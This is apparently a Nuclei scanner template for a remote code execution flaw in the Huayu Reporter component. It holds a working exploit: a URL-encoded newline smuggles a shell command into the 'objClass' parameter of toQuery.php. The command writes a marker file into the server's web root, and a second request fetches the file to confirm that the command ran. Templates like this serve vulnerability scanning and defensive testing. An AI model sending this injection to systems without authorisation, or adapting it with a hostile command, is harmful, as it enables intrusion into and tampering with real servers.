id: huayu-Reporter-rce

info:
  name: 华域Reporter组件 远程代码执行
  author: Str1am
  severity: high
  tags: Reporter,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%2715a1a2608a457%27%20>/var/www/reporter/view/Behavior/f029ff010012ms.txt%0a"
      - "{{BaseURL}}/view/Behavior/f029ff010012ms.txt"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "15a1a2608a457"
        part: body
        condition: and
